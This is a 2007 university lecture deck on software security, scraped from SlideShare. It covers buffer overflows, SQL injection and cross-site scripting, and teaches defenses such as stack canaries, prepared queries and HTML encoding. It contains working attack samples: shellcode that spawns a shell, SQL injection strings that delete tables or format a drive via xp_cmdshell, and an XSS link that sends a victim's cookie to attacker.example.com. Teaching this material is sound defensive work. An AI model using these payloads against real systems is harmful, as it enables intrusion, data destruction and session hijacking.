April 26, 2007 Centre College: Software Security

2,570 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,570
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
26
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Diagram from Ivan OWASP AppSec EU 2006.
  • Trend data from MITRE CWE.
  • FP still points at new frame. SP points at current top of stack, moving with local var allocation/deallocation.
  • Visual Studio 2005 and gcc 4.1 generate code with canaries by default. Use /gs on Visual Studio 2003, and –fstack-protect + gcc patch for gcc 3.x.
  • FP still points at new frame. SP points at current top of stack, moving with local var allocation/deallocation.
  • Principle of Least Privilege likely violated as web server user needs privileges to do all operators permitted on users, including deleting them.
  • April 26, 2007 Centre College: Software Security

    1. 1. Software Security Have You Ever Written a Security Bug? April 26, 2007 Centre College: Software Security
    2. 2. Charles Frank <ul><li>Department of Computer Science </li></ul><ul><li>Northern Kentucky University </li></ul><ul><li>[email_address] </li></ul><ul><li>http://www.nku.edu/~frank </li></ul>April 26, 2007 Centre College: Software Security
    3. 3. What We Don’t Know <ul><li>“ Have you ever written a program section with a security hole? How do you know?” </li></ul><ul><li>Mark G. Graff & Kenneth R. van Wyk </li></ul>April 26, 2007 Centre College: Software Security
    4. 4. A Growing Problem April 26, 2007 Centre College: Software Security
    5. 5. Traditional Security is Reactive <ul><li>Perimeter defense (firewalls) </li></ul><ul><li>Intrusion detection </li></ul><ul><li>Over-reliance on cryptography </li></ul><ul><li>Penetrate & patch </li></ul><ul><li>Penetration testing </li></ul>April 26, 2007 Centre College: Software Security
    6. 6. What is web application security? <ul><li>It’s more than just cryptography. </li></ul><ul><ul><li>SSL won’t solve all your problems. </li></ul></ul><ul><li>It’s more than securing the web server. </li></ul><ul><ul><li>Web applications have their own problems. </li></ul></ul><ul><li>It’s more than application firewalls. </li></ul><ul><ul><li>Firewall can’t know every safe action at every possible state in your application. </li></ul></ul>April 26, 2007 Centre College: Software Security
    7. 7. Firewalls don’t protect web apps April 26, 2007 Centre College: Software Security Firewall Port 80 HTTP Traffic Web Client Web Server Application Application Database Server
    8. 8. Penetrate and Patch <ul><li>Discover flaws after deployment. </li></ul><ul><ul><li>Often by attackers. </li></ul></ul><ul><ul><li>Users may not deploy patches. </li></ul></ul><ul><ul><li>Patches may have security flaws (15%?) </li></ul></ul><ul><li>Patches are maps to vulnerabilities. </li></ul><ul><ul><li>Attackers reverse engineer to create attacks. </li></ul></ul>April 26, 2007 Centre College: Software Security
    9. 9. Penetrate-and-Patch Approach April 26, 2007 Centre College: Software Security
    10. 10. The Problem is Software <ul><li>“ We wouldn’t have to spend so much time and effort on network security if we didn’t have such bad software security” Bruce Schneier </li></ul><ul><ul><li>“ Applied Cryptography” </li></ul></ul><ul><ul><li>“ Secrets & Lies: Digital Security in a Networked World” </li></ul></ul>April 26, 2007 Centre College: Software Security
    11. 11. Hackers <ul><li>“ Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.” </li></ul><ul><li>John Viega & Gary McGraw </li></ul>April 26, 2007 Centre College: Software Security
    12. 12. Developers Aren’t Ready <ul><li>“ 64% of developers are not confident in their ability to write secure applications” </li></ul><ul><li>Bill Gates, RSA 2005 </li></ul>April 26, 2007 Centre College: Software Security
    13. 13. Industry Problem <ul><li>There is no software liability – no incentive for secure software </li></ul><ul><li>Most developers never learned to produce secure code </li></ul><ul><li>Because of competition and cost considerations, software is produced under severe time constraints. </li></ul>April 26, 2007 Centre College: Software Security
    14. 14. Developer’s Education <ul><li>Most programming courses ignore secure software development </li></ul><ul><li>Most software engineering courses ignore secure software engineering </li></ul>April 26, 2007 Centre College: Software Security
    15. 15. Complexity <ul><li>Software products are growing in size </li></ul><ul><li>Windows XP has 40 million lines of code </li></ul><ul><li>5-50 bugs per KLOC </li></ul><ul><li>10% of bugs result in security faults </li></ul><ul><li>40,000KLOC*5*10% = 25,000 security bugs </li></ul><ul><li>Software is often written in low level languages such as C/C++ </li></ul>April 26, 2007 Centre College: Software Security
    16. 16. Security Problems <ul><li>SECURITY BUGS </li></ul><ul><li>50% </li></ul><ul><li>Buffer overflow </li></ul><ul><li>Command injection </li></ul><ul><li>Cross-site scripting </li></ul><ul><li>Integer overflow </li></ul><ul><li>Race condition </li></ul><ul><li>Untrusted input </li></ul>April 26, 2007 Centre College: Software Security <ul><li>ARCHITECTURAL FLAWS </li></ul><ul><li>50% </li></ul><ul><li>Cryptography misuse </li></ul><ul><li>Lack of compartmentalization </li></ul><ul><li>More privilege than necessary </li></ul><ul><li>Relying on secret algorithms </li></ul><ul><li>Sharing resources </li></ul><ul><li>Usability problems </li></ul>
    17. 17. Essential Facts <ul><li>Software Security ≠ Security Features </li></ul><ul><ul><li>Cryptography will not make you secure. </li></ul></ul><ul><ul><li>Application firewalls will not provide security. </li></ul></ul><ul><li>50/50 Architecture/Coding Problems </li></ul><ul><li>An Emergent Property of Software </li></ul><ul><ul><li>Like Usability or Reliability </li></ul></ul><ul><ul><li>Not a Feature </li></ul></ul>April 26, 2007 Centre College: Software Security
    18. 18. Software Security Practices <ul><li>Code Reviews </li></ul><ul><li>Risk Analysis </li></ul><ul><li>Penetration Testing </li></ul>April 26, 2007 Centre College: Software Security <ul><li>Security Testing </li></ul><ul><li>Abuse Cases </li></ul><ul><li>Security Operations </li></ul>Security Operations Requirements Design Coding Testing Maintenance Risk Analysis Abuse Cases Code Reviews + Static Analysis Penetration Testing Security Testing
    19. 19. Vulnerability Trends for 2006 April 26, 2007 Centre College: Software Security
    20. 20. Software Vulnerabilities <ul><li>Malicious Client </li></ul><ul><li>Buffer Overflow </li></ul><ul><li>SQL Injection </li></ul><ul><li>Cross-site Scripting </li></ul><ul><li>Format String </li></ul><ul><li>Race Condition </li></ul><ul><li>Information Leakage </li></ul><ul><li>Path Traversal </li></ul><ul><li>Command Injection </li></ul><ul><li>Integer Overflow </li></ul><ul><li>PHP Include </li></ul>April 26, 2007 Centre College: Software Security
    21. 21. Malicious Client <ul><li>Developers can mistakenly trust data from a client in server-side code </li></ul><ul><li>Attackers can advantage of this trust </li></ul><ul><li>Security tester’s job is to violate the data specifications to find security vulnerabilities </li></ul>April 26, 2007 Centre College: Software Security
    22. 22. Manipulate Network Requests <ul><li>Write a client to send custom requests </li></ul><ul><ul><li>Might modify the client code to send malformed requests </li></ul></ul><ul><li>Use a proxy to receive network traffic from a client and modify it to send it to the server. </li></ul><ul><ul><li>Foxfire Add-on “Tamper Data” </li></ul></ul><ul><ul><li>WebScarab from OWASP </li></ul></ul>April 26, 2007 Centre College: Software Security
    23. 23. Tamper Data <ul><li>Firefox Browser Add-on </li></ul><ul><li>Google for Tamper Data </li></ul><ul><li>Tools | Tamper Data </li></ul>April 26, 2007 Centre College: Software Security
    24. 24. Tamper Data April 26, 2007 Centre College: Software Security
    25. 25. Tamper Data April 26, 2007 Centre College: Software Security
    26. 26. Buffer Overflow Topics <ul><li>What is a Buffer Overflow? </li></ul><ul><li>Buffer Overflow Examples </li></ul><ul><li>Program Stacks </li></ul><ul><li>Smashing the Stack </li></ul><ul><li>Shellcode </li></ul><ul><li>Mitigations </li></ul>April 26, 2007 Centre College: Software Security
    27. 27. Buffer Overflows <ul><li>A program accepts too much input and stores it in a fixed length buffer that’s too small. </li></ul><ul><ul><li>char A[8]; </li></ul></ul><ul><ul><li>short B; </li></ul></ul>April 26, 2007 Centre College: Software Security <ul><ul><li>gets(A); </li></ul></ul>A A A A A A A A B B 0 0 0 0 0 0 0 0 0 3 A A A A A A A A B B o v e r f l o w s 0
    28. 28. Buffer Overflow Examples <ul><li>Morris Worm </li></ul><ul><ul><li>Took down most of Internet in 1988. </li></ul></ul><ul><ul><li>Exploited a buffer overflow in fingerd . </li></ul></ul><ul><ul><li>Subsequent worms used overflow attacks too. </li></ul></ul><ul><li>MS07-004: Internet Explorer </li></ul><ul><ul><li>Buffer overflow in VML. </li></ul></ul><ul><ul><li>Allows remote code execution. </li></ul></ul><ul><ul><li>Not the first overflow in IE or other browsers. </li></ul></ul>April 26, 2007 Centre College: Software Security
    29. 29. Buffer Overflow Example #1 <ul><li>What’s the mistake in this program? </li></ul><ul><li>int main() { </li></ul><ul><li>int array[5] = {1, 2, 3, 4, 5}; </li></ul><ul><li>printf(&quot;%d &quot;, array[5]); </li></ul><ul><li>} </li></ul><ul><li>Program output: </li></ul><ul><li>> gcc -o buffer buffer.c </li></ul><ul><li>> ./buffer </li></ul><ul><li>7077876 </li></ul>April 26, 2007 Centre College: Software Security
    30. 30. Buffer Overflow Example #2 <ul><li>Writing beyond the buffer: </li></ul><ul><ul><li>int main() { </li></ul></ul><ul><ul><li>int array[5] = {1, 2, 3, 4, 5}; </li></ul></ul><ul><ul><li>int i; </li></ul></ul><ul><ul><li>for( i=0; i <= 255; ++i ) </li></ul></ul><ul><ul><li>array[i] = 41; </li></ul></ul><ul><ul><li>} </li></ul></ul><ul><li>Program output: </li></ul><ul><li>> gcc -o bufferw bufferw.c </li></ul><ul><li>> ./bufferw </li></ul><ul><li>Segmentation fault (core dumped) </li></ul>April 26, 2007 Centre College: Software Security
    31. 31. What happened to our program? <ul><li>The buffer overflow: </li></ul><ul><ul><li>Overwrote memory beyond buffer with 41. </li></ul></ul><ul><ul><li>Memory page was not writable by program. </li></ul></ul><ul><ul><li>OS terminated prog with segmentation fault. </li></ul></ul><ul><li>Do overflows always produce a crash? </li></ul><ul><ul><li>Most of the time, yes. </li></ul></ul><ul><ul><li>Careful attacker can access valid memory. </li></ul></ul>April 26, 2007 Centre College: Software Security
    32. 32. Why do programmers keep making the same mistake? <ul><li>C/C++ inherently unsafe. </li></ul><ul><ul><li>No bounds checking. </li></ul></ul><ul><ul><li>Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc. </li></ul></ul><ul><li>Java, Python largely immune. </li></ul><ul><li>C/C++ gains performance by not checking. </li></ul>April 26, 2007 Centre College: Software Security
    33. 33. Stack at Function Start <ul><li>Frame Pointer </li></ul><ul><li>Stack Pointer </li></ul>April 26, 2007 Centre College: Software Security old stack frame parameter #N … parameter #1 return address old FP local vars
    34. 34. Shellcode <ul><li>Shellcode is machine code that starts a command shell. With a shell, you can run any command. </li></ul>April 26, 2007 Centre College: Software Security
    35. 35. Shellcode <ul><li>Shellcode in C. </li></ul><ul><ul><li>int main() { </li></ul></ul><ul><ul><li>char *name[2]; </li></ul></ul><ul><ul><li>name[0] = &quot;/bin/sh&quot;; </li></ul></ul><ul><ul><li>name[1] = 0x0; </li></ul></ul><ul><ul><li>execve(name[0], name, 0x0); </li></ul></ul><ul><ul><li>} </li></ul></ul><ul><li>Running the program. </li></ul><ul><ul><li>> gcc –ggdb –static –o shell shellcode.c </li></ul></ul><ul><ul><li>> ./shell </li></ul></ul><ul><ul><li>sh-3.00$ exit </li></ul></ul>April 26, 2007 Centre College: Software Security
    36. 36. From C to Machine Language <ul><li>char shellcode[] = </li></ul><ul><li>&quot;xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b&quot; </li></ul><ul><li>&quot;x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd&quot; </li></ul><ul><li>&quot;x80xe8xdcxffxffxff/bin/sh&quot;; </li></ul><ul><li>void main() { </li></ul><ul><li>int *ret; </li></ul><ul><li>ret = (int *)&ret + 2; </li></ul><ul><li>(*ret) = (int)shellcode; </li></ul><ul><li>} </li></ul><ul><li>> gcc -o testsc2 testsc2.c </li></ul><ul><li>> ./testsc2 </li></ul><ul><li>sh-3.00$ exit </li></ul>April 26, 2007 Centre College: Software Security
    37. 37. Writing an Exploit <ul><li>Construct shellcode to inject. </li></ul><ul><li>Find exploitable buffer in a program. </li></ul><ul><li>Estimate address of buffer. </li></ul><ul><li>Run program with an input that: </li></ul><ul><ul><li>Injects shellcode into stack memory. </li></ul></ul><ul><ul><li>Overwrites return address with address of your shellcode. </li></ul></ul>April 26, 2007 Centre College: Software Security
    38. 38. Compiler Defenses: Canaries <ul><li>Goal : Detect altered return addresses. </li></ul><ul><li>Method : Compiler changes stack layout. </li></ul><ul><ul><li>Adds canary to stack when function called. </li></ul></ul><ul><ul><li>Must overwrite canary to change return addr. </li></ul></ul><ul><ul><li>Checks canary before function returns. </li></ul></ul><ul><ul><li>Terminate program if canary modified. </li></ul></ul><ul><ul><li>Canaries are random to prevent guessing. </li></ul></ul><ul><ul><li>Visual Studio 2005 and gcc 4.1 use canaries. </li></ul></ul>April 26, 2007 Centre College: Software Security
    39. 39. Canary Stack Layout April 26, 2007 Centre College: Software Security old frame param2 param1 return address saved EBP canary value local vars
    40. 40. Buffer Overflow: Key Points <ul><li>Buffer overflow attacks. </li></ul><ul><ul><li>C/C++ perform no bounds checking. </li></ul></ul><ul><ul><li>There is no difference btw code and data. </li></ul></ul><ul><ul><li>Smashing the stack. </li></ul></ul><ul><li>Mitigating buffer overflows. </li></ul><ul><ul><li>Use a language with bounds checking. </li></ul></ul><ul><ul><li>Check your own bounds in C/C++. </li></ul></ul><ul><ul><li>Use safe functions, string libraries. </li></ul></ul>April 26, 2007 Centre College: Software Security
    41. 41. SQL Injection <ul><li>App sends form to user. </li></ul><ul><li>Attacker submits form with SQL exploit data. </li></ul><ul><li>Application builds string with exploit data. </li></ul><ul><li>Application sends SQL query to DB. </li></ul><ul><li>DB executes query, including exploit, sends data back to application. </li></ul><ul><li>Application returns data to user. </li></ul>April 26, 2007 Centre College: Software Security Attacker Web Server DB Server Firewall User Pass ‘ or 1=1--
    42. 42. SQL Injection in PHP <ul><li>$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die (&quot;Couldn't connect: &quot; . mysql_error()); </li></ul><ul><li>mysql_select_db($DB_DATABASE); </li></ul><ul><li>$query = &quot;select count(*) from users where username = '$username' and password = '$password'&quot;; </li></ul><ul><li>$result = mysql_query($query); </li></ul>April 26, 2007 Centre College: Software Security
    43. 43. SQL Metacharacters <ul><li>‘ quotes parameters </li></ul><ul><li>; separates commands </li></ul><ul><li>-- comments </li></ul><ul><li>%, _ glob in LIKE clause </li></ul><ul><li>%, _, *, +, |, [], () used for regular expressions in SIMILAR TO clause </li></ul>April 26, 2007 Centre College: Software Security
    44. 44. SQL Injection Attack #1 <ul><li>Unauthorized Access Attempt: </li></ul><ul><ul><li>password = ’ or 1=1 -- </li></ul></ul><ul><li>SQL statement becomes: </li></ul><ul><ul><li>select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- </li></ul></ul><ul><ul><li>Checks if password is empty OR 1=1, which is always true, permitting access. </li></ul></ul>April 26, 2007 Centre College: Software Security
    45. 45. SQL Injection Attack #2 <ul><li>Database Modification Attack: </li></ul><ul><ul><li>password = foo’; delete from table users where username like ‘% </li></ul></ul><ul><li>Database executes two SQL statements: </li></ul><ul><ul><li>select count(*) from users where username = ‘user’ and password = ‘foo’ </li></ul></ul><ul><ul><li>delete from table users where username like ‘%’ </li></ul></ul>April 26, 2007 Centre College: Software Security
    46. 46. Impact of SQL Injection <ul><li>SELECT SSN FROM USERS WHERE UID=‘$UID’ </li></ul>April 26, 2007 Centre College: Software Security INPUT RESULT 5 Returns info for user with UID 5. ‘ OR 1=1-- Returns info for all users. ‘ UNION SELECT Field FROM Table WHERE 1=1-- Returns all rows from another table. ‘ ;DROP TABLE USERS-- Deletes the users table. ‘ ;master.dbo.xp_cmdshell ‘cmd.exe format c: /q /yes’ -- Formats C: drive of database server if you’re running MS SQL Server and extended procedures aren’t disabled.
    47. 47. Solution: Prepared Queries <ul><li>require_once 'MDB2.php'; </li></ul><ul><li>$mdb2 =& MDB2::factory($dsn, $options); </li></ul><ul><li>if (PEAR::isError($mdb2)) { </li></ul><ul><li>die($mdb2->getMessage()); </li></ul><ul><li>} </li></ul><ul><li>$sql = “SELECT count(*) from users where username = ? and password = ? ”; </li></ul><ul><li>$types = array('text', 'text'); </li></ul><ul><li>$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP); </li></ul><ul><li>$data = array($username, $password); </li></ul><ul><li>$sth->execute($data); </li></ul>April 26, 2007 Centre College: Software Security
    48. 48. Cross Site Scripting Attacks (XSS) <ul><li>Run Javascript in the victim’s browser </li></ul><ul><ul><li><script>alert(‘XSS’);</script> </li></ul></ul><ul><li>Get the user’s cookie for the Web site to display – perhaps revealing the session ID </li></ul><ul><ul><li><script>alert(document.cookie);</script> </li></ul></ul><ul><li>Steal the cookie and hijack the user’s session </li></ul><ul><ul><li>Craft a request to the attackers machine with the cookie as part of the file name, e.g. for an image source. </li></ul></ul>April 26, 2007 Centre College: Software Security
    49. 49. Reflected XSS Attacks <ul><li>Server side code takes script in user input and echoes the script back to run on the user machine. </li></ul>April 26, 2007 Centre College: Software Security
    50. 50. Example <ul><li>http://server/search.aspx?keyword=<SCRIPT> alert(“Running!)</SCRIPT> </li></ul><ul><li><BODY> </li></ul><ul><li><H1>Search Results</H1> </li></ul><ul><li>for =<SCRIPT> alert(“Running!)</SCRIPT> </li></ul><ul><li><h2>Sorry, no results were found for.</h2> </li></ul>April 26, 2007 Centre College: Software Security
    51. 51. Exploiting an XSS Bug <ul><li>Attacker must trick the user into running the URL with the query string. </li></ul><ul><li>Send a user an email with a link to a Web site </li></ul><ul><li>http://server/search.aspx?keyword=<SCRIPT>document.location=“http://attacker.example.com/default.aspx?%2Bescape(document.cookie);”</SCRIPT> </li></ul>April 26, 2007 Centre College: Software Security
    52. 52. Anatomy of an XSS Attack April 26, 2007 Centre College: Software Security 1. Login 2. Cookie Web Server 3. XSS Attack Attacker User 4. User clicks on XSS link. 5. XSS URL 7. Browser runs injected code. Evil Site saves cookie. 8. Attacker uses stolen cookie to hijack user session. 6. Page with injected code.
    53. 53. Exploiting POST <ul><li><body> </li></ul><ul><li><% </li></ul><ul><li>dim strName: strName = Request.Form(&quot;myName&quot;) </li></ul><ul><li>if strName = &quot;&quot; then </li></ul><ul><li>%> </li></ul><ul><li><form method=&quot;POST&quot; name=&quot;myForm&quot;> </li></ul><ul><li>Name: <input type=&quot;text&quot; name=&quot;myName&quot;> <input type=&quot;submit&quot; value=&quot;Submit&quot;> </li></ul><ul><li></form> </li></ul><ul><li></body> </li></ul><ul><li></html> </li></ul><ul><li><% </li></ul><ul><li> Response.End </li></ul><ul><li>Else </li></ul><ul><li> Response.Write &quot;Hello, &quot; & strName & &quot;. Nice to meet you.&quot; </li></ul><ul><li>End If </li></ul><ul><li>%> </li></ul><ul><li></body> </li></ul>April 26, 2007 Centre College: Software Security
    54. 54. What should we enter for Name? <ul><li><SCRIPT>alert(‘XSS!’)</SCRIPT> </li></ul>April 26, 2007 Centre College: Software Security
    55. 55. Getting the Victim to Submit Malicious POST <ul><li>Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user’s name on the attacker’s Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability. </li></ul>April 26, 2007 Centre College: Software Security
    56. 56. Testing <ul><li>Save the Web page to your site. </li></ul><ul><li><form method=“POST” name=“myForm” action= http://VulnerableWebSite/helloPostDemo.asp > </li></ul><ul><li><input type=“text” name=“myName” value=“&lt;SCRIPT&gt;alert(‘Hi!’)&lt/SCRIPT&gt;”> </li></ul>April 26, 2007 Centre College: Software Security
    57. 57. Automatically Submitting <ul><li><body> </li></ul><ul><li>… . </li></ul><ul><li><SCRIPT>Form.submit();</SCRIPT> </li></ul>April 26, 2007 Centre College: Software Security
    58. 58. Persistent XSS Attack <ul><li>Put <script>alert(‘Hi!’)</script> into a guestbook entry. </li></ul><ul><li>View the guestbook entries page again. </li></ul>April 26, 2007 Centre College: Software Security
    59. 59. Stopping XSS Attacks <ul><li>Encode HTML of attacker’s input before returning it to the browser. </li></ul><ul><li>Problem: Blogs may want users to use HTML. Block the script tag? </li></ul>April 26, 2007 Centre College: Software Security Original Character HTML Encoded < &lt; > &gt; & &amp; “ &quot;
    60. 60. Events <ul><li>Most tags have events </li></ul><ul><li><INPUT name=“txtInput2” type=“text” value = ‘ OurData’ onclick=alert(‘Hi’) junk=‘’> </li></ul><ul><li>When the user clicks on the text box the onclick event will fire. </li></ul>April 26, 2007 Centre College: Software Security
    61. 61. Microsoft ASP.NET <ul><li>When ValidateRequest property is enabled, the query string and POST data are inspected. </li></ul><ul><li>Suspicious data, such as <script> and onload=, cause an exception to be thrown. </li></ul>April 26, 2007 Centre College: Software Security
    62. 62. Identifying XSS Vulnerabilities <ul><li>Identify where user data is supplied. </li></ul><ul><li>Send valid-looking data to the application. </li></ul><ul><li>Verify whether any of the data is returned to the Web browser. </li></ul><ul><li>Find ways to force the victim to send data and have it run as a script on the client machine. </li></ul>April 26, 2007 Centre College: Software Security
    63. 63. Knowledge <ul><li>SPI Dynamic White papers </li></ul><ul><ul><li>http://www.spidynamics.com/spilabs/education/whitepapers.html </li></ul></ul><ul><ul><li>Blind SQL Injection </li></ul></ul><ul><ul><li>Cross Site Scripting </li></ul></ul>April 26, 2007 Centre College: Software Security
    64. 64. OWASP Web Goat <ul><li>Teaches Web application security through a series of lessons. </li></ul><ul><li>http://www.owasp.org/index.php/OWASP_WebGoat_Project </li></ul><ul><li>Lesson Plans </li></ul><ul><ul><li>http://www.owasp.org/index.php/Lesson_Plans </li></ul></ul>April 26, 2007 Centre College: Software Security
    65. 65. Going Further April 26, 2007 Centre College: Software Security

    ×